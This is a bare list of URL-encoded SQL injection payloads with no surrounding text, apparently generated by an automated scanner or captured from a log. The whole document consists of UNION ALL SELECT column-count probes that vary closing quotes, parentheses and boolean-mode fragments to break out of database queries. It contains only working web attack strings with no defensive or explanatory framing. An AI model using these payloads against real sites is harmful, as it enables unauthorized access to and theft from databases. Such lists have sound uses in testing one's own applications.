1234.5%27%2B%28SELECT%20eRCi%20WHERE%203064%3D3064%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27UoRS%27%20WHERE%201695%3D1695%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27Iqtl%27%20WHERE%207899%3D7899%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27KsXr%27%20WHERE%201414%3D1414%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27Vczv%27%20WHERE%205439%3D5439%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27entz%27%20WHERE%209301%3D9301%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27bISc%27%20WHERE%207586%3D7586%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27Eofv%27%20WHERE%201282%3D1282%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27PdfV%27%20WHERE%209042%3D9042%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27rYSq%27%20WHERE%203765%3D3765%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27fKMp%27%20WHERE%204681%3D4681%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -3335%29%20UNION%20ALL%20SELECT%207512%2C7512%2C7512%2C7512%2C7512%2C7512%2C7512%2C7512%2C7512%2C7512%2C7512--%20 -3258%29%20UNION%20ALL%20SELECT%207620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620--%20 -1739%29%20UNION%20ALL%20SELECT%202816%2C2816%2C2816%2C2816%2C2816%2C2816%2C2816%2C2816%2C2816%2C2816%2C2816%2C2816%2C2816--%20 -8729%29%20UNION%20ALL%20SELECT%208718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718%2C8718--%20 -6366%29%20UNION%20ALL%20SELECT%201990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990%2C1990--%20 -3345%29%20UNION%20ALL%20SELECT%209554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554--%20 -7517%29%20UNION%20ALL%20SELECT%207184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184%2C7184--%20 -7892%29%20UNION%20ALL%20SELECT%203948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948%2C3948--%20 -4108%29%20UNION%20ALL%20SELECT%203374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374%2C3374--%20 -3043%29%20UNION%20ALL%20SELECT%209540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540--%20 -8295%27%29%20UNION%20ALL%20SELECT%201023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023--%20 -9460%27%29%20UNION%20ALL%20SELECT%208225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225%2C8225--%20 -1260%27%29%20UNION%20ALL%20SELECT%204073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073%2C4073--%20 -4853%27%29%20UNION%20ALL%20SELECT%205090%2C5090%2C5090%2C5090%2C5090%2C5090%2C5090%2C5090%2C5090%2C5090%2C5090%2C5090%2C5090%2C5090--%20 -7078%27%29%20UNION%20ALL%20SELECT%204259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259%2C4259--%20 -9044%27%29%20UNION%20ALL%20SELECT%202357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357%2C2357--%20 -3155%27%29%20UNION%20ALL%20SELECT%202474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474%2C2474--%20 -8279%27%29%20UNION%20ALL%20SELECT%209259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259%2C9259--%20 -7778%27%29%20UNION%20ALL%20SELECT%206640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640%2C6640--%20 -5518%27%29%20UNION%20ALL%20SELECT%209397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397%2C9397--%20 -4158%27%20UNION%20ALL%20SELECT%201678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678%2C1678--%20 -3098%27%20UNION%20ALL%20SELECT%201381%2C1381%2C1381%2C1381%2C1381%2C1381%2C1381%2C1381%2C1381%2C1381%2C1381%2C1381--%20 -9464%27%20UNION%20ALL%20SELECT%207823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823%2C7823--%20 -8930%27%20UNION%20ALL%20SELECT%207606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606--%20 -1308%27%20UNION%20ALL%20SELECT%202408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408%2C2408--%20 -5704%27%20UNION%20ALL%20SELECT%209190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190--%20 -8189%27%20UNION%20ALL%20SELECT%202617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617%2C2617--%20 -4457%27%20UNION%20ALL%20SELECT%206902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902%2C6902--%20 -6173%27%20UNION%20ALL%20SELECT%204011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011%2C4011--%20 -8465%27%20UNION%20ALL%20SELECT%209592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592%2C9592--%20 -5395%22%20UNION%20ALL%20SELECT%203619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619--%20 -5493%22%20UNION%20ALL%20SELECT%204836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836--%20 -7535%22%20UNION%20ALL%20SELECT%201667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667%2C1667--%20 -7799%22%20UNION%20ALL%20SELECT%201908%2C1908%2C1908%2C1908%2C1908%2C1908%2C1908%2C1908%2C1908%2C1908%2C1908%2C1908%2C1908%2C1908--%20 -5206%22%20UNION%20ALL%20SELECT%203912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912--%20 -4817%22%20UNION%20ALL%20SELECT%207702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702%2C7702--%20 -7757%22%20UNION%20ALL%20SELECT%202054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054--%20 -7279%22%20UNION%20ALL%20SELECT%201895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895%2C1895--%20 -8570%22%20UNION%20ALL%20SELECT%205404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404%2C5404--%20 -3678%22%20UNION%20ALL%20SELECT%209680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680%2C9680--%20 -3613%29%20UNION%20ALL%20SELECT%209179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179%2C9179--%20 -9970%29%20UNION%20ALL%20SELECT%207516%2C7516%2C7516%2C7516%2C7516%2C7516%2C7516%2C7516%2C7516%2C7516%2C7516%2C7516--%20 -5288%29%20UNION%20ALL%20SELECT%206125%2C6125%2C6125%2C6125%2C6125%2C6125%2C6125%2C6125%2C6125%2C6125%2C6125%2C6125%2C6125--%20 -4662%29%20UNION%20ALL%20SELECT%202235%2C2235%2C2235%2C2235%2C2235%2C2235%2C2235%2C2235%2C2235%2C2235%2C2235%2C2235%2C2235%2C2235--%20 -4068%29%20UNION%20ALL%20SELECT%207676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676%2C7676--%20 -2101%29%20UNION%20ALL%20SELECT%207937%2C7937%2C7937%2C7937%2C7937%2C7937%2C7937%2C7937%2C7937%2C7937%2C7937%2C7937%2C7937%2C7937%2C7937%2C7937--%20 -9241%29%20UNION%20ALL%20SELECT%206878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878%2C6878--%20 -6575%29%20UNION%20ALL%20SELECT%201224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224%2C1224--%20 -5030%29%20UNION%20ALL%20SELECT%203286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286%2C3286--%20 -3800%29%20UNION%20ALL%20SELECT%207257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257--%20 -3960%29%29%20UNION%20ALL%20SELECT%201307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307%2C1307--%20 -1438%29%29%20UNION%20ALL%20SELECT%206434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434--%20 -2110%29%29%20UNION%20ALL%20SELECT%204685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685--%20 -8476%29%29%20UNION%20ALL%20SELECT%205561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561--%20 -7536%29%29%20UNION%20ALL%20SELECT%209841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841%2C9841--%20 -9853%29%29%20UNION%20ALL%20SELECT%203341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341--%20 -8924%29%29%20UNION%20ALL%20SELECT%201073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073%2C1073--%20 -1551%29%29%20UNION%20ALL%20SELECT%203510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510%2C3510--%20 -2926%29%29%20UNION%20ALL%20SELECT%204083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083%2C4083--%20 -4901%29%29%20UNION%20ALL%20SELECT%203873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873%2C3873--%20 -6039%29%29%29%20UNION%20ALL%20SELECT%209664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664%2C9664--%20 -8717%29%29%29%20UNION%20ALL%20SELECT%207318%2C7318%2C7318%2C7318%2C7318%2C7318%2C7318%2C7318%2C7318%2C7318%2C7318%2C7318--%20 -7850%29%29%29%20UNION%20ALL%20SELECT%202848%2C2848%2C2848%2C2848%2C2848%2C2848%2C2848%2C2848%2C2848%2C2848%2C2848%2C2848%2C2848--%20 -8645%29%29%29%20UNION%20ALL%20SELECT%203919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919%2C3919--%20 -5240%29%29%29%20UNION%20ALL%20SELECT%203133%2C3133%2C3133%2C3133%2C3133%2C3133%2C3133%2C3133%2C3133%2C3133%2C3133%2C3133%2C3133%2C3133%2C3133--%20 -9386%29%29%29%20UNION%20ALL%20SELECT%209268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268%2C9268--%20 -6436%29%29%29%20UNION%20ALL%20SELECT%206920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920%2C6920--%20 -7836%29%29%29%20UNION%20ALL%20SELECT%203335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335--%20 -3669%29%29%29%20UNION%20ALL%20SELECT%208482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482%2C8482--%20 -6245%29%29%29%20UNION%20ALL%20SELECT%203745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745%2C3745--%20 -9995%20UNION%20ALL%20SELECT%202786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786%2C2786--%20 -3988%20UNION%20ALL%20SELECT%207510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510%2C7510--%20 -3241%20UNION%20ALL%20SELECT%208135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135%2C8135--%20 -5068%20UNION%20ALL%20SELECT%206085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085%2C6085--%20 -7792%20UNION%20ALL%20SELECT%205109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109%2C5109--%20 -6980%20UNION%20ALL%20SELECT%202312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312%2C2312--%20 -6364%20UNION%20ALL%20SELECT%204610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610%2C4610--%20 -4946%20UNION%20ALL%20SELECT%201985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985--%20 -9350%20UNION%20ALL%20SELECT%208366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366%2C8366--%20 -1876%20UNION%20ALL%20SELECT%208508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508%2C8508--%20 -3021%27%29%20UNION%20ALL%20SELECT%201011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011%2C1011--%20 -4497%27%29%20UNION%20ALL%20SELECT%209338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338%2C9338--%20 -5253%27%29%20UNION%20ALL%20SELECT%208970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970--%20 -5211%27%29%20UNION%20ALL%20SELECT%209096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096%2C9096--%20 -3548%27%29%20UNION%20ALL%20SELECT%201103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103%2C1103--%20 -3914%27%29%20UNION%20ALL%20SELECT%201612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612%2C1612--%20 -8685%27%29%20UNION%20ALL%20SELECT%207130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130%2C7130--%20 -2652%27%29%20UNION%20ALL%20SELECT%209710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710%2C9710--%20 -5831%27%29%20UNION%20ALL%20SELECT%202359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359%2C2359--%20 -6000%27%29%20UNION%20ALL%20SELECT%201779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779%2C1779--%20 -7208%27%29%29%20UNION%20ALL%20SELECT%206372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372%2C6372--%20 -9186%27%29%29%20UNION%20ALL%20SELECT%204367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367%2C4367--%20 -1080%27%29%29%20UNION%20ALL%20SELECT%203845%2C3845%2C3845%2C3845%2C3845%2C3845%2C3845%2C3845%2C3845%2C3845%2C3845%2C3845%2C3845--%20 -9075%27%29%29%20UNION%20ALL%20SELECT%209534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534%2C9534--%20 -1675%27%29%29%20UNION%20ALL%20SELECT%203748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748%2C3748--%20 -2413%27%29%29%20UNION%20ALL%20SELECT%203284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284%2C3284--%20 -7223%27%29%29%20UNION%20ALL%20SELECT%206232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232%2C6232--%20 -8559%27%29%29%20UNION%20ALL%20SELECT%208931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931%2C8931--%20 -6698%27%29%29%20UNION%20ALL%20SELECT%206618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618--%20 -1972%27%29%29%20UNION%20ALL%20SELECT%201300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300%2C1300--%20 -8593%27%29%29%29%20UNION%20ALL%20SELECT%207113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113%2C7113--%20 -6672%27%29%29%29%20UNION%20ALL%20SELECT%207506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506%2C7506--%20 -5917%27%29%29%29%20UNION%20ALL%20SELECT%204926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926%2C4926--%20 -7039%27%29%29%29%20UNION%20ALL%20SELECT%207125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125%2C7125--%20 -3457%27%29%29%29%20UNION%20ALL%20SELECT%205756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756%2C5756--%20 -7618%27%29%29%29%20UNION%20ALL%20SELECT%202139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139%2C2139--%20 -3450%27%29%29%29%20UNION%20ALL%20SELECT%201032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032--%20 -3504%27%29%29%29%20UNION%20ALL%20SELECT%208836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836%2C8836--%20 -6358%27%29%29%29%20UNION%20ALL%20SELECT%206377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377%2C6377--%20 -1168%27%29%29%29%20UNION%20ALL%20SELECT%204530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530%2C4530--%20 -5081%27%20UNION%20ALL%20SELECT%201674%2C1674%2C1674%2C1674%2C1674%2C1674%2C1674%2C1674%2C1674%2C1674%2C1674--%20 -3119%27%20UNION%20ALL%20SELECT%204883%2C4883%2C4883%2C4883%2C4883%2C4883%2C4883%2C4883%2C4883%2C4883%2C4883%2C4883--%20 -8383%27%20UNION%20ALL%20SELECT%207366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366%2C7366--%20 -7451%27%20UNION%20ALL%20SELECT%204336%2C4336%2C4336%2C4336%2C4336%2C4336%2C4336%2C4336%2C4336%2C4336%2C4336%2C4336%2C4336%2C4336--%20 -5741%27%20UNION%20ALL%20SELECT%206591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591%2C6591--%20 -5556%27%20UNION%20ALL%20SELECT%206393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393--%20 -7955%27%20UNION%20ALL%20SELECT%203308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308%2C3308--%20 